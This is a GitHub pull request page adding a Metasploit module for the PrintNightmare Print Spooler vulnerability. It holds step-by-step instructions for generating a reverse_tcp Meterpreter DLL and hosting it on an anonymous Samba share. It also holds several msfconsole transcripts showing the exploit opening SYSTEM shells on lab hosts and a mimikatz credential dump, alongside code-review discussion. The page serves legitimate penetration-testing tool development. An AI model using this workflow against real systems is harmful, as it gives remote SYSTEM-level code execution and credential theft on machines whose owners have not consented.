Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Module For CVE-2021-1675 / CVE-2021-34527 AKA PrintNightmare #15385

Merged
merged 11 commits into from
Jul 7, 2021

Conversation

zeroSteiner
Copy link
Contributor

@zeroSteiner zeroSteiner commented Jul 1, 2021

This is a module to trigger a remote DLL load by abusing a vulnerability in the Print Spooler service. At this time because Metasploit's SMB server doesn't support SMB3, it's highly recommended to use an external SMB server like Samba that does in order to test newer targets like Server 2019. The module docs walk through the process of generating a payload DLL and then using this module to load it.

The necessary DCERPC stuff is defined in this module for now. This is because it should be over in RubySMB, but there are some pending improvements in rapid7/ruby_smb#168 that will affect this once they are landed. For the time being, keeping it in the module seems fine and I can move it to it's permanent home in RubySMB and update it at the same time. Storing it in the module for now allows both projects to move forward independently.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use auxiliary/admin/dcerpc/cve_2021_1675_printnightmare
  • Set the RHOST and DLL_PATH options
    • When setting UDLL_PATH use an x64 Meterpreter DLL
    • use payload/windows/x64/meterpreter/reverse_tcp
    • Set your options then to_handler and generate -f dll -o /path/to/save/it.dll
  • Make sure the DLL for the UNC_PATH is hosted on an SMB3 compatible server if you're targeting a newer version of Windows like Server 2019, I used and recommend Samba

Samba Configuration

For your convenience, this is the section I used in the samba configuration to host the DLL with anonymous access.

[public]
	comment = Public Directories
	path = /var/public
	guest ok = Yes

Example Output

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/admin/dcerpc/cve_2021_1675_printnightmare 
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > set DLL_PATH \\\\192.168.159.128\\public\\reverse_tcp.x64.dll
DLL_PATH => \\192.168.159.128\public\reverse_tcp.x64.dll
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > set RHOSTS 192.168.159.96
RHOSTS => 192.168.159.96
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > set SMBUSER aliddle
SMBUSER => aliddle
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > set SMBPASS Password1
SMBPASS => Password1
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > run
[*] Running module against 192.168.159.96

[*] 192.168.159.96:445 - Target environment: Windows v10.0.17763 (x64)
[*] 192.168.159.96:445 - Binding to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.159.96[\spoolss] ...
[*] 192.168.159.96:445 - Bound to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.159.96[\spoolss] ...
[*] 192.168.159.96:445 - Enumerating the installed printer drivers...
[*] 192.168.159.96:445 - Using driver path: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_2097e02ea77b432e\Amd64\UNIDRV.DLL
[*] 192.168.159.96:445 - Using directory: C:\Windows\system32\spool\DRIVERS\x64
[*] 192.168.159.96:445 - RpcAddPrinterDriverEx response 0 ERROR_SUCCESS (The operation completed successfully.)
[*] Sending stage (200262 bytes) to 192.168.159.96
[*] 192.168.159.96:445 - Error STATUS_PIPE_BROKEN (The pipe operation has failed because the other end of the pipe has been closed.)
[-] 192.168.159.96:445 - Error STATUS_PIPE_CLOSING (The specified named pipe is in the closing state.)
[-] 192.168.159.96:445 - Error STATUS_PIPE_CLOSING (The specified named pipe is in the closing state.)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > [*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.96:49732) at 2021-07-02 15:59:30 -0400

msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-3MSP8K2LCGC
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter >

@wvu wvu added the module label Jul 1, 2021
@zeroSteiner zeroSteiner changed the title Add Module For CVE-2021-1675 AKA PrintNightmare Add Module For CVE-2021-1675 / CVE-2021-34527 AKA PrintNightmare Jul 2, 2021
@zeroSteiner zeroSteiner marked this pull request as ready for review July 2, 2021 20:01
@Romiko
Copy link

Romiko commented Jul 4, 2021

Great work getting this in soon.

@Romiko
Copy link

Romiko commented Jul 5, 2021

Any way we can upgrade Metasploit to support SMB3?

@zeroSteiner
Copy link
Contributor Author

Any way we can upgrade Metasploit to support SMB3?

That's unfortunately no easy task. It's a project that's on our radar at the moment but we haven't committed to a timeline yet. It's highly unlikely that it'll be completed in the next couple of months.

error = errors.first
message << " #{error.name} (#{error.description})"
end
vprint_status(message)
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Additional error handling needs to be performed here. If a user provides an inaccessible DLL_PATH, the module will fail with no message printed unless VERBOSE is enabled:

msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > run
[*] Running module against 192.168.91.196

[*] 192.168.91.196:445 - Target environment: Windows v10.0.17763 (x64)
[*] 192.168.91.196:445 - Enumerating the installed printer drivers...
[*] Auxiliary module execution completed

With VERBOSE enabled, it looks like this:

msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > run
[*] Running module against 192.168.91.196

[*] 192.168.91.196:445 - Target environment: Windows v10.0.17763 (x64)
[*] 192.168.91.196:445 - Binding to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.91.196[\spoolss] ...
[*] 192.168.91.196:445 - Bound to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.91.196[\spoolss] ...
[*] 192.168.91.196:445 - Enumerating the installed printer drivers...
[*] 192.168.91.196:445 - Using driver path: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] 192.168.91.196:445 - Using directory: C:\Windows\system32\spool\DRIVERS\x64
[*] 192.168.91.196:445 - RpcAddPrinterDriverEx response 384
[*] 192.168.91.196:445 - RpcAddPrinterDriverEx response 3 ERROR_PATH_NOT_FOUND (The system cannot find the path specified.)
[*] 192.168.91.196:445 - RpcAddPrinterDriverEx response 3 ERROR_PATH_NOT_FOUND (The system cannot find the path specified.)
[*] 192.168.91.196:445 - RpcAddPrinterDriverEx response 3 ERROR_PATH_NOT_FOUND (The system cannot find the path specified.)
[*] Auxiliary module execution completed

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Well the error is handled in this case, there's no stack trace and the module continues to execute as normal. It probably makes sense though to print the error message even when VERBOSE is disabled.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

You're right, I just meant to make sure error messages like this are always printed.

@ErikWynter
Copy link
Contributor

ErikWynter commented Jul 6, 2021

@zeroSteiner I had some unexpected results while testing this, so I figured to share them here in case they may be of interest to you.
Based on two test runs, it seems that I need to run the module 3 times before I get a shell. After I got my first shell, I restored the target VM to the same snapshot and then once again had to run the exploit three times. The pattern was as follows:

  • On the first run, RpcAddPrinterDriverEx returns file not found and path not found errors during the config file assignment:
 1.upto(3) do |directory|
      container.driver_info.p_config_file.assign("#{config_directory}\\3\\old\\#{directory}\\#{filename}")
      add_printer_driver_ex("\\\\#{datastore['RHOST']}", container, flags)
    end
  • On the second run, it says the pipe is closing
  • On the third run, the RpcAddPrinterDriverEx Print System RPC request fails and the module is aborted, but then it does pop a shell.

Here is my output with VERBOSE enabled:

Exploitation against Microsoft Windows Server 2019 Standard Evaluation

msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > show options 

Module options (auxiliary/admin/dcerpc/cve_2021_1675_printnightmare): 
                                                                                                                                                                                                           
   Name       Current Setting                            Required  Description                                                                                                                             
   ----       ---------------                            --------  -----------
   DLL_PATH   \\192.168.91.131\lies\reverse_tcp.x64.dll  yes       The path to the DLL that the server should load                            
   RHOSTS     192.168.91.205                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      445                                        no        The netlogon RPC port (TCP)                                                                                                             
   SMBDomain  ecorp                                      no        The Windows domain to use for authentication
   SMBPass    MyPassword123!                             no        The password for the specified username                                                          
   SMBUser    lowpriv                                    no        The username to authenticate as
                                                                                                                                                                                                           
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > run
[*] Running module against 192.168.91.205

[*] 192.168.91.205:445 - Target environment: Windows v10.0.17763 (x64)
[*] 192.168.91.205:445 - Binding to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.91.205[\spoolss] ...
[*] 192.168.91.205:445 - Bound to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.91.205[\spoolss] ...
[*] 192.168.91.205:445 - Enumerating the installed printer drivers...
[*] 192.168.91.205:445 - Using driver path: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] 192.168.91.205:445 - Using directory: C:\Windows\system32\spool\DRIVERS\x64
[*] 192.168.91.205:445 - RpcAddPrinterDriverEx response 0 ERROR_SUCCESS (The operation completed successfully.)
[*] 192.168.91.205:445 - RpcAddPrinterDriverEx response 2 ERROR_FILE_NOT_FOUND (The system cannot find the file specified.)
[*] 192.168.91.205:445 - RpcAddPrinterDriverEx response 3 ERROR_PATH_NOT_FOUND (The system cannot find the path specified.)
[*] 192.168.91.205:445 - RpcAddPrinterDriverEx response 3 ERROR_PATH_NOT_FOUND (The system cannot find the path specified.)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > run
[*] Running module against 192.168.91.205

[*] 192.168.91.205:445 - Target environment: Windows v10.0.17763 (x64)
[*] 192.168.91.205:445 - Binding to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.91.205[\spoolss] ...
[*] 192.168.91.205:445 - Bound to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.91.205[\spoolss] ...
[*] 192.168.91.205:445 - Enumerating the installed printer drivers...
[*] 192.168.91.205:445 - Using driver path: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] 192.168.91.205:445 - Using directory: C:\Windows\system32\spool\DRIVERS\x64
[*] 192.168.91.205:445 - Error STATUS_PIPE_BROKEN (The pipe operation has failed because the other end of the pipe has been closed.)
[-] 192.168.91.205:445 - Error STATUS_PIPE_CLOSING (The specified named pipe is in the closing state.)
[-] 192.168.91.205:445 - Error STATUS_PIPE_CLOSING (The specified named pipe is in the closing state.)
[-] 192.168.91.205:445 - Error STATUS_PIPE_CLOSING (The specified named pipe is in the closing state.)
[*] Auxiliary module execution completed

msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > run
[*] Running module against 192.168.91.205

[*] 192.168.91.205:445 - Target environment: Windows v10.0.17763 (x64)
[*] 192.168.91.205:445 - Binding to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.91.205[\spoolss] ...
[*] 192.168.91.205:445 - Bound to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.91.205[\spoolss] ...
[*] 192.168.91.205:445 - Enumerating the installed printer drivers...
[*] 192.168.91.205:445 - Using driver path: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] 192.168.91.205:445 - Using directory: C:\Windows\system32\spool\DRIVERS\x64
[*] 192.168.91.205:445 - RpcAddPrinterDriverEx response 0 ERROR_SUCCESS (The operation completed successfully.)
[*] Sending stage (200262 bytes) to 192.168.91.205
[-] 192.168.91.205:445 - Auxiliary aborted due to failure: unexpected-reply: The RpcAddPrinterDriverEx Print System RPC request failed (DCERPC FAULT => 0xc000000d).
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > [*] Meterpreter session 2 opened (192.168.91.131:4444 -> 192.168.91.205:58653) at 2021-07-06 13:54:34 +0000
sessions 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

@ErikWynter
Copy link
Contributor

I can also confirm that reexploitation does not seem possible, at least within a short timeframe and possibly not until the target is rebooted, as is specified in the reliability note. This is my output of trying to rerun the module after popping a shell:

meterpreter > background                                                                                                                                                                                   
[*] Backgrounding session 2...          
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > run
[*] Running module against 192.168.91.205

[*] 192.168.91.205:445 - Target environment: Windows v10.0.17763 (x64)
[*] 192.168.91.205:445 - Binding to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.91.205[\spoolss] ...
[*] 192.168.91.205:445 - Bound to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.91.205[\spoolss] ...
[*] 192.168.91.205:445 - Enumerating the installed printer drivers...
[*] 192.168.91.205:445 - Using driver path: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] 192.168.91.205:445 - Using directory: C:\Windows\system32\spool\DRIVERS\x64
[*] 192.168.91.205:445 - RpcAddPrinterDriverEx response 0 ERROR_SUCCESS (The operation completed successfully.)
[*] 192.168.91.205:445 - Error STATUS_PIPE_BROKEN (The pipe operation has failed because the other end of the pipe has been closed.)
[-] 192.168.91.205:445 - Error STATUS_PIPE_CLOSING (The specified named pipe is in the closing state.)
[-] 192.168.91.205:445 - Error STATUS_PIPE_CLOSING (The specified named pipe is in the closing state.)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > run
[*] Running module against 192.168.91.205

[*] 192.168.91.205:445 - Target environment: Windows v10.0.17763 (x64)
[*] 192.168.91.205:445 - Binding to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.91.205[\spoolss] ...
[-] 192.168.91.205:445 - Auxiliary aborted due to failure: unreachable: The DCERPC bind failed with error STATUS_OBJECT_NAME_NOT_FOUND (The object name is not found.)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > run
[*] Running module against 192.168.91.205

[*] 192.168.91.205:445 - Target environment: Windows v10.0.17763 (x64)
[*] 192.168.91.205:445 - Binding to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.91.205[\spoolss] ...
[-] 192.168.91.205:445 - Auxiliary aborted due to failure: unreachable: The DCERPC bind failed with error STATUS_OBJECT_NAME_NOT_FOUND (The object name is not found.)
[*] Auxiliary module execution completed

If the response codes while attempting reexploitation are distinct and consistent, it may be possible to add a check to identify reexploitation attempts and inform users that this likely won't work.

@ErikWynter
Copy link
Contributor

I can also confirm that reexploitation does not seem possible, at least within a short timeframe and possibly not until the target is rebooted, as is specified in the reliability note. This is my output of trying to rerun the module after popping a shell:

It actually seems that reexploitation is possible after killing the session. I was now able to reexploit the same host without rebooting after I killed the initial session:

Reexploitation without rebooting the target

msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > run                                                                                                                                    [17/764]
[*] Running module against 192.168.91.208                                                                                                                                                                  
[*] 192.168.91.208:445 - Target environment: Windows v10.0.17763 (x64)
[*] 192.168.91.208:445 - Binding to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.91.208[\spoolss] ...                                                     
[*] 192.168.91.208:445 - Bound to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.91.208[\spoolss] ...
[*] 192.168.91.208:445 - Enumerating the installed printer drivers...
[*] 192.168.91.208:445 - Using driver path: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] 192.168.91.208:445 - Using directory: C:\Windows\system32\spool\DRIVERS\x64
[*] 192.168.91.208:445 - RpcAddPrinterDriverEx response 0 ERROR_SUCCESS (The operation completed successfully.)
[*] Sending stage (200262 bytes) to 192.168.91.208
[-] 192.168.91.208:445 - Auxiliary aborted due to failure: unexpected-reply: The RpcAddPrinterDriverEx Print System RPC request failed (DCERPC FAULT => 0xc000000d).
[*] Auxiliary module execution completed                                                             
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > [*] Meterpreter session 3 opened (192.168.91.131:4444 -> 192.168.91.208:58653) at 2021-07-06 14:41:27 +0000
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > sessions 3
[*] Starting interaction with 3...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.91.208 - Meterpreter session 3 closed.  Reason: User exit
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > sessions
Active sessions
===============
No active sessions.
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > run
[*] Running module against 192.168.91.208
[*] 192.168.91.208:445 - Target environment: Windows v10.0.17763 (x64)
[*] 192.168.91.208:445 - Binding to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.91.208[\spoolss] ...
[*] 192.168.91.208:445 - Bound to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.91.208[\spoolss] ...
[*] 192.168.91.208:445 - Enumerating the installed printer drivers...
[*] 192.168.91.208:445 - Using driver path: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] 192.168.91.208:445 - Using directory: C:\Windows\system32\spool\DRIVERS\x64
[*] 192.168.91.208:445 - RpcAddPrinterDriverEx response 0 ERROR_SUCCESS (The operation completed successfully.)
[*] Sending stage (200262 bytes) to 192.168.91.208
[*] 192.168.91.208:445 - Error STATUS_PIPE_BROKEN (The pipe operation has failed because the other end of the pipe has been closed.)
[-] 192.168.91.208:445 - Error STATUS_PIPE_CLOSING (The specified named pipe is in the closing state.)
[-] 192.168.91.208:445 - Error STATUS_PIPE_CLOSING (The specified named pipe is in the closing state.)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > [*] Meterpreter session 4 opened (192.168.91.131:4444 -> 192.168.91.208:58674) at 2021-07-06 14:43:28 +0000
sessions 4
[*] Starting interaction with 4...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

@gwillcox-r7 gwillcox-r7 self-assigned this Jul 6, 2021
Copy link
Contributor

@gwillcox-r7 gwillcox-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Minor documentation changes, overall looks good though. Will review the source code next.

Comment on lines +74 to +76
[*] 192.168.159.96:445 - Error STATUS_PIPE_BROKEN (The pipe operation has failed because the other end of the pipe has been closed.)
[-] 192.168.159.96:445 - Error STATUS_PIPE_CLOSING (The specified named pipe is in the closing state.)
[-] 192.168.159.96:445 - Error STATUS_PIPE_CLOSING (The specified named pipe is in the closing state.)
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Think this was discussed before but personally I do think these should be behind a verbose flag as it gives the false impression that something went wrong on the remote end and the exploit is going to fail. If you had a message before this explaining that some errors were going to occur in normal situations I might be inclined to keep this in here but right now my eyes are draw to this and my first thought is "oh shooooot thats not good", which is never a good feeling to give a pentester :D

begin
response = rprn_call('RpcAddPrinterDriverEx', p_name: name, p_driver_container: container, dw_file_copy_flags: flags)
rescue RubySMB::Error::UnexpectedStatusCode => e
nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Assuming that no ret value could be found using find_by_retval, the result of calling this line will be be that nt_status is set to nil as .first will be called on an empty array, and this should be accounted for to avoid a crash on the following line.

@gwillcox-r7
Copy link
Contributor

Quick test shows this is working fine against a fresh Windows Server 2019 install:

msf6 > use auxiliary/admin/dcerpc/cve_2021_1675_printnightmare
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > use use payload/windows/x64/meterpreter/reverse_tcp
[-] No results from search
[-] Failed to load module: use
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > use payload/windows/x64/meterpreter/reverse_tcp
msf6 payload(windows/x64/meterpreter/reverse_tcp) > show options

Module options (payload/windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

msf6 payload(windows/x64/meterpreter/reverse_tcp) > set LHOST 192.168.224.128
LHOST => 192.168.224.128
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set LPORT 8822
LPORT => 8822
msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 192.168.224.128:8822 
msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -f dll -o /home/gwillcox/payload.dll
[*] Writing 8704 bytes to /home/gwillcox/payload.dll...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/admin/dcerpc/cve_2021_1675_printnightmare
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > show options

Module options (auxiliary/admin/dcerpc/cve_2021_1675_printnightmare):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DLL_PATH                    yes       The network-based UNC path or local path on the remote target from which the server sho
                                         uld load the DLL
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as

msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > set DLL_PATH \\192.168.224.128\public\payload.dll
DLL_PATH => \192.168.224.128publicpayload.dll
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > set DLL_PATH \\\\192.168.224.128\\public\\payload.dll
DLL_PATH => \\192.168.224.128\public\payload.dll
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > set RHOSTS 192.168.224.166
RHOSTS => 192.168.224.166
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > show optoins
[-] Invalid parameter "optoins", use "show -h" for more information
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > show options

Module options (auxiliary/admin/dcerpc/cve_2021_1675_printnightmare):

   Name       Current Setting                       Required  Description
   ----       ---------------                       --------  -----------
   DLL_PATH   \\192.168.224.128\public\payload.dll  yes       The network-based UNC path or local path on the remote target from
                                                               which the server should load the DLL
   RHOSTS     192.168.224.166                       yes       The target host(s), range CIDR identifier, or hosts file with synt
                                                              ax 'file:<path>'
   RPORT      445                                   yes       The SMB service port (TCP)
   SMBDomain  .                                     no        The Windows domain to use for authentication
   SMBPass                                          no        The password for the specified username
   SMBUser                                          no        The username to authenticate as

msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > exploit
[*] Running module against 192.168.224.166

[*] 192.168.224.166:445 - Executing automatic check (disable AutoCheck to override)
[-] 192.168.224.166:445 - Auxiliary aborted due to failure: unknown: Cannot reliably check exploitability. Failed to authenticate to the remote service. Enable ForceExploit to override check result.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > set SMBUser test
SMBUser => test
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > set SMBPass test
SMBPass => test
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > exploit
[*] Running module against 192.168.224.166

[*] 192.168.224.166:445 - Executing automatic check (disable AutoCheck to override)
[!] 192.168.224.166:445 - The service is running, but could not be validated. Successfully bound to the remote service.
[*] 192.168.224.166:445 - Target environment: Windows v10.0.17763 (x64)
[*] 192.168.224.166:445 - Enumerating the installed printer drivers...
[*] 192.168.224.166:445 - Retrieving the path of the printer driver directory...
[*] 192.168.224.166:445 - The named pipe connection was broken, reconnecting after a 10 second delay.
[*] Sending stage (200262 bytes) to 192.168.224.166
[-] 192.168.224.166:445 - Auxiliary aborted due to failure: unexpected-reply: The RpcAddPrinterDriverEx Print System RPC request failed (DCERPC FAULT => 0xc000000d).
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > [*] Meterpreter session 1 opened (192.168.224.128:8822 -> 192.168.224.166:49728) at 2021-07-07 16:48:48 -0500

msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ WIN-SSUPDDTOOIS  192.168.224.128:8822 -> 192.168.224.166:49728 (192.1
                                                                            68.224.166)

msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeImpersonatePrivilege
SeTcbPrivilege

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain           NTLM                              SHA1
--------  ------           ----                              ----
test      WIN-SSUPDDTOOIS  * *

wdigest credentials
===================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
WIN-SSUPDDTOOIS$  WORKGROUP        (null)
test              WIN-SSUPDDTOOIS  (null)

kerberos credentials
====================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
test              WIN-SSUPDDTOOIS  (null)
win-ssupddtoois$  WORKGROUP        (null)


meterpreter > 

gwillcox-r7 added a commit that referenced this pull request Jul 7, 2021
@gwillcox-r7 gwillcox-r7 merged commit f42aa37 into rapid7:master Jul 7, 2021
@gwillcox-r7
Copy link
Contributor

Release Notes

A new module has been added to Metasploit to exploit PrintNightmare, aka CVE-2021-1675/CVE-2021-34527, a Remote Code Execution vulnerability in the Print Spooler service of Windows. Successful exploitation results in the ability to load and execute an attacker controlled DLL as the SYSTEM user.

@gwillcox-r7 gwillcox-r7 added the hotness Something we're really excited about label Jul 8, 2021
@0x41414141
Copy link
Contributor

This could be improved by using the MSF::Exploit::Remote::SMB::Server::Share class to host the DLL rather than requiring samba to be setup outside of metasploit.

@wvu
Copy link
Contributor

wvu commented Jul 8, 2021

At this time because Metasploit's SMB server doesn't support SMB3, it's highly recommended to use an external SMB server like Samba that does in order to test newer targets like Server 2019.

@0x41414141
Copy link
Contributor

This could be improved by using an SMB sharing service within metasploit once SMB3 sharing lands in ruby_smb 😊

@wvu
Copy link
Contributor

wvu commented Jul 8, 2021

Absolutely!

@zeroSteiner zeroSteiner deleted the feat/cve-2021-1675 branch July 8, 2021 12:51
@zeroSteiner
Copy link
Contributor Author

There's an RFC for SMB3 server support if anyone that's interested wants to go and +1 it to show their support.

@gwillcox-r7 gwillcox-r7 added the rn-modules release notes for new or majorly enhanced modules label Jul 8, 2021
@BettyNutz
Copy link

BettyNutz commented Jul 19, 2021

how does this get into MSF? or how do i get it into MSF6 - just do an apt update? - i'd like to know the process.

Can you just copy the ruby code into: /usr/share/metasploit-framework/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.rb

@ErikWynter
Copy link
Contributor

how does this get into MSF? or how do i get it into MSF6 - just do an apt update? - i'd like to know the process.

Can you just copy the ruby code into: /usr/share/metasploit-framework/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.rb

Hey @BettyNutz if you are using the apt repository version of Metasploit, which seems to be the case, it can take a very long time before the packages will be updated to the current version, so apt update isn't going to do you any good for quite a while. If you want to use this module now, you have two options:

  1. As you said, you can simply copy the cve_2021_1675_printnightmare.rb file from GitHub to your local system. You can find the raw version here.
  2. You can clone the metasploit-framework repository and manually run git pull every now and then to update it with the latest exploits. In order to be able to run metasploit from within the cloned repo, you need to make sure all necessary dependencies are installed. You can use this article. If you don't plan to do any dev work on the framework, you can ignore all the git stuff.

@bcoles
Copy link
Contributor

bcoles commented Jul 19, 2021

how does this get into MSF? or how do i get it into MSF6 - just do an apt update? - i'd like to know the process.

Pull requests are merged into the master branch. The master branch is released as a new point release every week. From there, package managers for various distros (ie, Kali) will eventually package the new release into a package available using the operating system package manager (ie, apt).

Can you just copy the ruby code into: /usr/share/metasploit-framework/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.rb

In this instance, yes, you can copy the module to whichever directory your Metasploit installation loads modules from.

On kali that is /usr/share/metasploit-framework/modules/ by default. Modules in $HOME/.msf4/modules/ will also be loaded automatically.

@ErikWynter
Copy link
Contributor

lol fantastic timing @bcoles

@BettyNutz
Copy link

BettyNutz commented Jul 19, 2021

how does this get into MSF? or how do i get it into MSF6 - just do an apt update? - i'd like to know the process.
